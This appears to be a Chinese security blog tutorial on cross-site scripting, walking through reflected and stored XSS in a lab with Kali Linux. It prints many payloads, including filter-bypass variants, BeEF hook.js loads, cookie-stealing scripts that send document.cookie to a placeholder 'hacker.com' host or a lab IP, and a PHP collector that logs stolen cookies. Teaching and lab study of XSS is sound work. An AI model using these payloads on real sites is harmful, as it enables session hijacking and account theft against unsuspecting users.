<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">








<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



  <meta name="google-site-verification" content="ZsntNucQnwgOG8NJsPVjhDxi8hx9YmTvgqa9eReuux0">



  <meta name="msvalidate.01" content="A3C088EA1884107284C9F5B94B1C667F">






  <meta name="baidu-site-verification" content="rLNDlRl5mo">







  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/avatar.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/avatar.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/avatar.jpg?v=5.1.4">


  <link rel="mask-icon" href="/images/avatar.jpg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="XSS简介">
<meta name="keywords" content="Python | CTF | SEC | 笔记 | 加密 | writeup | 小维同学 | 网络安全 | 博客">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS跨站脚本攻击">
<meta property="og:url" content="https://axiaowei.cn/2019/06/19/201946/index.html">
<meta property="og:site_name" content="小维的博客">
<meta property="og:description" content="XSS简介">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27ydg1g1lj30rb0n3q5a.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t3lqh6dj31600krdgu.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t3dg6gdj30os0f93z3.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t5trr3tj310b0du0tb.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t5z82s8j31100dojrz.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27tjhblf0j30v80ceaaf.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27uins51sj30ue0jg767.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27uk58z5jj30u80jjadq.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27ukf36upj30r70feq36.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27ukox2c2j30zo0li0up.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27uykkxvyj30kl0drwmm.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27wrb8ij3j30ko0gvqde.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27xdyk876j30kr0dwdmo.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27wwa9gfwj30uu0kddif.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27wwa8a7nj30uu0kdwh5.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27xa12ws9j30on0i4gm8.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27x74fkn5j31ed0iatwg.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zbd24eij30nq0fnqgf.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zey0vy6j30or0jg758.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zha1brej30oh0i575t.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zlx3bj2j30yy0ht757.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zkucilmj30op0entaw.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zb4ug6cj30op0k4acq.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g2819kfnfaj30s20f8gn2.jpg">
<meta property="og:updated_time" content="2019-06-19T05:16:36.106Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS跨站脚本攻击">
<meta name="twitter:description" content="XSS简介">
<meta name="twitter:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g27ydg1g1lj30rb0n3q5a.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":10,"b2t":true,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://axiaowei.cn/2019/06/19/201946/">





  <title>XSS跨站脚本攻击 | 小维的博客</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">小维的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Python | CTF | Writeup | Note | 安全 |关于图片无法加载问题，需科学上网才可以正常加载，近期会全部更换为云存储或者本地存储</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://axiaowei.cn/2019/06/19/201946/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="小维同学">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小维的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS跨站脚本攻击</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-19T13:06:50+08:00">
                2019-06-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2,270字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  9分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h4 id="XSS简介"><a href="#XSS简介" class="headerlink" title="XSS简介"></a>XSS简介</h4><a id="more"></a>
<blockquote>
<p>跨站脚本(cross site script) 为了避免与样式css混淆，所以简称为XSS。<br><br>XSS是一种经常出现web应用中的计算机安全漏洞，也是web中最主流的攻击方式。那么什么是XSS呢？<br><br>XSS是恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点，进而添加一些恶意代码，嵌入(HTML、JavaScript)到web页面中去。使别的用户访问都会执行相应的嵌入代码。<br><br>从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。<br><br><br><br>XSS攻击的危害包括：<br><br>-盗取各类用户账号，如机器登陆账号、用户网银账号、各类管理员账号 <br><br>-控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力 <br><br>-盗窃企业重要的具有商业价值的资料 <br><br>-非法转账 <br><br>-强制发送电子邮件 <br><br>-网站挂马 <br><br>-DDOS<br>-控制受害者机器向其他网站发起攻击 <br><br>…</p>
</blockquote>
<h4 id="原理分析"><a href="#原理分析" class="headerlink" title="原理分析"></a>原理分析</h4><p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27ydg1g1lj30rb0n3q5a.jpg" alt=""><br><a href="http://processon.com/chart_image/5cb7d7c0e4b09b16ffbc6c95.png" target="_blank" rel="noopener">http://processon.com/chart_image/5cb7d7c0e4b09b16ffbc6c95.png</a></p>
<blockquote>
<p>XSS主要的原因：<br>过于信任客户端提交的数据！<br><br><br><br>XSS主要分类：<br><br>反射型xss攻击(Reflected XSS) 又称为非持久性跨站点脚本攻击，它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的URL(即每次攻击需要用户的点击)。<br><br><br><br>存储型XSS(Stored XSS) 又称为持久型跨站点脚本，他一般发生在XSS攻击向量(一般指的XSS攻击代码)存储在网站数据库，一般出现在网站的留言板、评论处、个人资料等需要用户可以对网站写入数据的地方，当页面被用户打开的时候执行。每当用户打开浏览器，脚本执行。持久的XSS相比非持久型XSS攻击危害性更大，因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。<br><br><br><br>DOM型XSS（基于dom的跨站点脚本攻击）<br>DOM—based XSS漏洞是基于文档对象模型Document Objeet Model，DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如URL，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM—based XSS漏洞。</p>
</blockquote>
<h4 id="构造XSS脚本"><a href="#构造XSS脚本" class="headerlink" title="构造XSS脚本"></a>构造XSS脚本</h4><h5 id="常用HTML标签"><a href="#常用HTML标签" class="headerlink" title="常用HTML标签"></a>常用HTML标签</h5><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe&gt; iframe 元素会创建包含另一个文档的内联框架(即行内框架) </span><br><span class="line">&lt;textarea&gt; &lt;textarea&gt; 标签定义多行的文本输入控件 </span><br><span class="line">&lt;img&gt; img元素向网页中嵌入一幅图像 </span><br><span class="line">&lt;script&gt; &lt;script&gt; 标签用于定义客户端脚本,比如JavaScript。</span><br><span class="line">        <span class="built_in"> script </span>元素既可以包含脚本语句，也可以通过src属性指向外部脚本文件。</span><br><span class="line">         必需的type 属性规定脚本的MIME类型</span><br><span class="line">         JavaScript 的常见应用时图像操作、表单验证以及动态内容更新。</span><br></pre></td></tr></table></figure>
<h5 id="常用JavaScript方法"><a href="#常用JavaScript方法" class="headerlink" title="常用JavaScript方法"></a>常用JavaScript方法</h5><figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">alert   alert()方法用于显示带有一条指定消息和一个确认按钮的警告框</span><br><span class="line">window.<span class="keyword">location</span> <span class="title">window</span>.<span class="keyword">location</span> <span class="title">对象用于获得当前页面的地址(URL</span>),并把浏览器重定向到新的页面。</span><br><span class="line">location.herf 返回当前显示的文档的完整URL</span><br><span class="line">onload 一张页面或一幅图像完成加载</span><br><span class="line">onsubmit 确认按钮点击</span><br><span class="line">onerror 在加载文档或图像时发生错误</span><br></pre></td></tr></table></figure>
<h5 id="构造XSS脚本-1"><a href="#构造XSS脚本-1" class="headerlink" title="构造XSS脚本"></a>构造XSS脚本</h5><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">弹框警告</span><br><span class="line">此脚本实现弹框，一般作为漏洞或者演示使用，类似SQL注入测试的单引号',一旦此脚本能执行，也就意味着后端服务器没有对特殊字符做过滤<span class="tag">&lt;&gt;</span>/' 这样就可以证明，这个页面位置存在了XSS漏洞。</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="actionscript">alert(<span class="string">'xss'</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="built_in">document</span>.cookie)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span> //获取cookie</span><br></pre></td></tr></table></figure>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">页面嵌套</span><br><span class="line">&lt;iframe <span class="attribute">src</span>=http://www.baidu.com <span class="attribute">width</span>=300 <span class="attribute">height</span>=300&gt;&lt;/iframe&gt;</span><br><span class="line">&lt;iframe <span class="attribute">src</span>=http://www.baidu.com <span class="attribute">width</span>=0 <span class="attribute">height</span>=0 <span class="attribute">border</span>=0&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">页面重定向</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">window</span>.location=<span class="string">"http://www.axiaowei.cn"</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="actionscript">location.href=<span class="string">"http://www.baidu.com"</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">弹框警告并重定向</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="actionscript">alert(<span class="string">"请移步到我们的新站"</span>);location.href=<span class="string">"http://www.axiaowei.cn"</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="actionscript">alert(<span class="string">'xss'</span>);location.href=<span class="string">"http://192.168.203.19/mutillidae/robots.txt"</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">这里结合了一些社工思路，例如：通过网站内部私信的方式将其发送给其他用户。如果其他用户点击并且相信了这个信息，则可能在另外的站点重新登陆账户(克隆网站收集账户)</span><br></pre></td></tr></table></figure>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">访问恶意代码</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"http://www.axiaowei.cn/xss.js"</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"http://BeEF_IP:3000/hook.js"</span>&gt;</span><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>     //结合BeEF收集用户的cookie</span><br></pre></td></tr></table></figure>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">巧用图片标签</span><br><span class="line">&lt;img <span class="attribute">src</span>=<span class="string">"#"</span> <span class="attribute">onerror</span>=alert('xss')&gt;</span><br><span class="line">&lt;img <span class="attribute">src</span>=<span class="string">"javascript:alert('xss');"</span>&gt;</span><br><span class="line">&lt;img <span class="attribute">src</span>=<span class="string">"http://BeEF_IP:3000/hook.js"</span>&gt;</span><br></pre></td></tr></table></figure>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">绕开过滤的脚本</span><br><span class="line">大小写 <span class="tag">&lt;<span class="name">ScrIpt</span>&gt;</span><span class="actionscript">alert(<span class="string">'xss'</span>)</span><span class="tag">&lt;/<span class="name">SCRipt</span>&gt;</span></span><br><span class="line">字符编码 采用URL、Base64等编码</span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#120;&amp;#115;&amp;#115;&amp;#39;&amp;#41;"</span>&gt;</span>xiaowei<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">收集用户cookie</span><br><span class="line">打开新窗口并且采用本地cookie访问目标网页</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">window</span>.open(<span class="string">"http://www.hacker.com/cookie.php?cookie="</span>+<span class="built_in">document</span>.cookie)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">"http://www.hacker.com/cookie.php?cookie="</span>+<span class="built_in">document</span>.cookie</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="keyword">new</span> Image().src=<span class="string">"http://www.hacker.com/cookie.php?cookie.php?cookie="</span>+<span class="built_in">document</span>.cookie;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://www.hacker.com/cookie.php?cookie='+document.cookie"</span>&gt;</span><span class="tag">&lt;/<span class="name">img</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">"http://www.hacker.com/cookie.php?cookie='+document.cookie"</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="actionscript"><span class="keyword">new</span> Image().src=<span class="string">"http://www.hacker.com/cookie.php?cookie='+document.cookie"</span>;</span></span><br><span class="line"><span class="undefined">img.width = 0;</span></span><br><span class="line"><span class="undefined">img.height = 0;</span></span><br><span class="line"><span class="undefined"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h5 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h5><h6 id="安全级别"><a href="#安全级别" class="headerlink" title="安全级别"></a>安全级别</h6><p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t3lqh6dj31600krdgu.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t3dg6gdj30os0f93z3.jpg" alt=""></p>
<h6 id="手工XSS"><a href="#手工XSS" class="headerlink" title="手工XSS"></a>手工XSS</h6><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">弹窗警告：</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="actionscript">alert(<span class="string">'xiaowei'</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript">alert(<span class="built_in">document</span>.cookie)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t5trr3tj310b0du0tb.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27t5z82s8j31100dojrz.jpg" alt=""></p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">页面重定向：</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="actionscript">location.href=<span class="string">"http://www.baidu.com"</span></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27tjhblf0j30v80ceaaf.jpg" alt=""></p>
<h5 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h5><figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">存储型XSS<span class="comment">(持久型)</span>即攻击者将带有XSS攻击的链接放在网页的某个页面，例如评论框，留言板等</span><br><span class="line">用户访问此XSS链接并执行，由于存储型XSS能够攻击所有访问此页面的用户，所以危害非常大。</span><br></pre></td></tr></table></figure>
<h6 id="手工-基础"><a href="#手工-基础" class="headerlink" title="手工(基础)"></a>手工(基础)</h6><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">攻击<span class="number">1</span> 弹框告警：kali linux 端操作</span><br><span class="line">Name : xiaowei</span><br><span class="line">Message <span class="symbol">:&lt;script&gt;alert</span>(<span class="string">'xiaowei'</span>)&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27uins51sj30ue0jg767.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27uk58z5jj30u80jjadq.jpg" alt=""></p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">弹框告警：肉鸡 Wi<span class="symbol">ndows10</span>端操作 浏览页面</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27ukf36upj30r70feq36.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27ukox2c2j30zo0li0up.jpg" alt=""></p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">攻击<span class="selector-tag">2</span>：获取<span class="selector-tag">cookie</span>：渗透机 <span class="selector-tag">Kali</span> <span class="selector-tag">Linux</span> 操作</span><br><span class="line">①构建收集<span class="selector-tag">cookie</span>服务器</span><br><span class="line">②构造<span class="selector-tag">XSS</span>代码并植入到<span class="selector-tag">web</span>服务器</span><br><span class="line">③等待肉鸡触发<span class="selector-tag">XSS</span>代码并将<span class="selector-tag">cookie</span>发送到渗透机(kali)</span><br><span class="line">④<span class="selector-tag">Cookie</span>利用</span><br></pre></td></tr></table></figure>
<p>构建收集服务器<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">确保apache2服务开启</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27uykkxvyj30kl0drwmm.jpg" alt=""><br><figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//创建cookie_rec.php脚本文件</span></span><br><span class="line">root@kali:~# vim /var/www/html/cookie_rec.php</span><br><span class="line"><span class="comment">//脚本内容</span></span><br><span class="line">&lt;?php</span><br><span class="line">	$cookie = $_GET[<span class="string">'cookie'</span>];</span><br><span class="line">	$log = <span class="keyword">fopen</span>(<span class="string">"cookie.txt"</span>,<span class="string">"a"</span>);</span><br><span class="line">	<span class="keyword">fwrite</span>($log,$cookie . <span class="string">"\n"</span>);</span><br><span class="line">	<span class="keyword">fclose</span>($log);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27wrb8ij3j30ko0gvqde.jpg" alt=""><br><figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 修改拥有者用户、用户组</span></span><br><span class="line"><span class="symbol">root@</span>kali:/# chown -R www-<span class="keyword">data</span>.www-<span class="keyword">data</span> /<span class="keyword">var</span>/www/</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27xdyk876j30kr0dwdmo.jpg" alt=""><br><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">通过渗透机植入XSS代码</span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">window</span>.open(<span class="string">'http://192.168.203.19/cookie_rec.php?cookie='</span>+<span class="built_in">document</span>.cookie)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">注意：192.168.203.19 为Kali Linux IP</span><br></pre></td></tr></table></figure></p>
<p>前端设置了长度限制50<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27wwa9gfwj30uu0kddif.jpg" alt=""><br>审查元素修改长度设置值<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27wwa8a7nj30uu0kdwh5.jpg" alt=""></p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">获取cookie：肉鸡 Wi<span class="symbol">ndows10</span>端操作 浏览页面</span><br><span class="line">注：这里浏览器需要允许弹窗</span><br></pre></td></tr></table></figure>
